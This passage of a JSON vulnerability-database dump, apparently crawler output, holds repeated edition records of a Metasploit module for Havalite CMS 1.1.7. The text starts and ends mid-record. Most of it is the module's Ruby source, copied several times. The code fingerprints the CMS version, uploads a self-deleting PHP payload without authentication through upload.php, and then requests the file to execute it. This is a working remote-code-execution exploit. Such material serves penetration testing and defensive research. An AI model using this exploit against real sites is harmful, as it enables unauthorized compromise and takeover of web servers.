\"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-09-17T20:10:40", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "d8a8900db352c2a9d98fa2554100226d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-10-11T13:47:29", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-10-11T13:47:29", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-10-11T15:47:01", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:0304", "RHSA-2019:0303"]}, {"type": "amazon", "idList": ["ALAS-2019-1156"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1671-1:EBBBE", "DEBIAN:DLA-1670-1:C56F6", "DEBIAN:DSA-4388-1:D6D01", "DEBIAN:DLA-1666-1:43CD3", "DEBIAN:DSA-4387-1:19CD5", "DEBIAN:DLA-1669-1:E907A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46341", "EDB-ID:46340"]}, {"type": "ubuntu", "idList": ["USN-3886-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:9165290622393060450", "KITPLOIT:7455761002232864942"]}, {"type": "centos", "idList": ["CESA-2019:0270", "CESA-2019:0231", "CESA-2019:0229"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0155-1", "OPENSUSE-SU-2019:0154-1"]}, {"type": "freebsd", "idList": ["E8BCAC84-2D5C-11E9-9A74-E0D55E2A8BF9"]}], "modified": "2018-10-11T15:47:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-10-11T15:47:01", "differentElements": ["modified", "published"], "edition": 68}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "1c6a84c103dae7b4255143c89774e47b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-03-15T04:52:31", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46513"]}, {"type": "redhat", "idList": ["RHSA-2019:0567", "RHSA-2019:0566", "RHSA-2019:0564", "RHSA-2019:0548", "RHSA-2019:0547", "RHSA-2019:0512", "RHSA-2019:0544"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0325-1", "OPENSUSE-SU-2019:0327-1", "OPENSUSE-SU-2019:0326-1"]}, {"type": "gentoo", "idList": ["GLSA-201903-11", "GLSA-201903-13", "GLSA-201903-14", "GLSA-201903-10", "GLSA-201903-12", "GLSA-201903-09"]}, {"type": "ubuntu", "idList": ["USN-3909-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1714-1:580CA", "DEBIAN:DLA-1713-1:F4DFB"]}], "modified": "2019-03-15T04:52:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-03-15T04:52:31", "differentElements": ["modified", "published"], "edition": 69}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-03-15T07:06:16", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46513"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4585"]}, {"type": "redhat", "idList": ["RHSA-2019:0567", "RHSA-2019:0566", "RHSA-2019:0564", "RHSA-2019:0548", "RHSA-2019:0547", "RHSA-2019:0512", "RHSA-2019:0544"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0325-1", "OPENSUSE-SU-2019:0327-1", "OPENSUSE-SU-2019:0326-1"]}, {"type": "gentoo", "idList": ["GLSA-201903-13", "GLSA-201903-11", "GLSA-201903-10", "GLSA-201903-14", "GLSA-201903-12", "GLSA-201903-09"]}, {"type": "ubuntu", "idList": ["USN-3909-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1714-1:580CA"]}], "modified": "2019-03-15T07:06:16"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-03-15T07:06:16", "differentElements": ["sourceData"], "edition": 70}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "d8a8900db352c2a9d98fa2554100226d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-03T10:07:59", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1125-1", "OPENSUSE-SU-2019:1123-1", "OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1121-1", "OPENSUSE-SU-2019:1112-1", "OPENSUSE-SU-2019:1107-1", "OPENSUSE-SU-2019:1118-1", "OPENSUSE-SU-2019:1104-1", "OPENSUSE-SU-2019:1114-1", "OPENSUSE-SU-2019:1119-1"]}], "modified": "2019-04-03T10:07:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-04-03T10:07:59", "differentElements": ["sourceData"], "edition": 71}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-03T12:02:11", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4422-1:16F13"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1125-1", "OPENSUSE-SU-2019:1123-1", "OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1121-1", "OPENSUSE-SU-2019:1112-1", "OPENSUSE-SU-2019:1107-1", "OPENSUSE-SU-2019:1118-1", "OPENSUSE-SU-2019:1104-1", "OPENSUSE-SU-2019:1114-1", "OPENSUSE-SU-2019:1119-1"]}], "modified": "2019-04-03T12:02:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-04-03T12:02:11", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "sourceHref"], "edition": 72}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T20:34:30", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 